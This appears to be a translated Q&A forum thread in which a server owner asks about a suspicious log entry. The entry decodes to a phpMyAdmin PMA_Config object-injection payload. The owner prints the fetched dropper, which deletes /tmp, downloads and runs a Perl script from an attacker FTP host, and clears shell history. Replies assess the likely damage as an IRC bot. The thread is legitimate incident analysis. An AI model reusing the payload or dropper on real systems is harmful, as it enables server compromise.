Log de acesso http suspeito.

2

Por favor me ajude! Percebi que o seguinte está registrado no meu arquivo de log http.

action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A47%3A%22ftp%3A%2F%2Fhawk1156%3ATuNPKPK123%40hawkish.co.uk%2Fieh.ico%22%3B%7D%7D

Quando decodifico, torna-se

action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:47:"ftp://hawk1156:[email protected]/ieh.ico";}}

Eu fiquei preocupado com o link ftp suspeito, e decidi baixá-lo.

wget ftp://hawk1156:[email protected]/ieh.ico

O conteúdo do arquivo foi assim:

<? system("cd /tmp;rm -rf *;wget ftp://hawk1156:[email protected]/2.txt;perl 2.txt;curl -O hawk1156://ftp:[email protected]/2.txt;perl 2.txt;fetch hawk1156://ftp:[email protected]/2.txt;perl 2.txt;rm -rf 2.txt;history -c;");exit?>

Claro, eu nunca fiz isso sozinho, mas não tenho certeza se meu servidor já foi invadido neste momento. O que devo fazer? Não sei por onde começar.

    
por user101359 27.10.2012 / 17:18

2 respostas

2

Nada mal até agora, mas não há como saber ainda.

Olhando para o comentário system suspeito, o comando que ele tenta fazer com que você seja executado parece excluir tudo em /tmp , , mas em nenhum outro lugar . Além disso, o site em suspeita foi retirado pelo provedor de hospedagem, então agora deve haver pouco para se preocupar. Observe que as conexões do MySQL sobre soquetes e serviços falharão até a próxima reinicialização devido à exclusão de arquivos de /tmp , mas nenhum dado deveria ter sido perdido (exceto seu histórico bash).

Eu apenas informava informalmente um desenvolvedor PHPMyAdmin, então, se não é uma falha de segurança que pode ser mal utilizada, um bug não é realmente feito por ele.

Bolded são os bits interessantes de comandos no código grande injetado:

<? system("cd /tmp;rm -rf * ... history -c;");exit?>

Também olhando, há um arquivo, ftp://hawk1156:[email protected]/2.txt que pode ter feito algo ruim, mas como eu não sei o que estava no arquivo, e o provedor de hospedagem derrubou a conta, não há como saiba o que faz, a menos que você consiga ext4undelete para tentar obter um registro dos danos. * Ele pode ter feito algo ruim. * Se você realmente desenterrar o arquivo com um utilitário undelete, poste-o aqui e eu ficarei feliz em examiná-lo.

Edit: Graças ao comentário de janeiro, que eu não notei, o máximo que este ataque parece ter feito é criar um bot de IRC. Se ainda houver perl em execução e você não tiver nenhum serviço crítico executado no PERL, execute:

sudo killall perl

ou reinicie.

    
por hexafraction 04.11.2012 / 01:32
0

Sim, alguém está tentando fazer uma exploração do PMA (PhpMyAdmin) em seu sistema, contanto que seu servidor retorne um número 200, pois você deve estar bem.

    
por JUBAN3 02.11.2012 / 10:04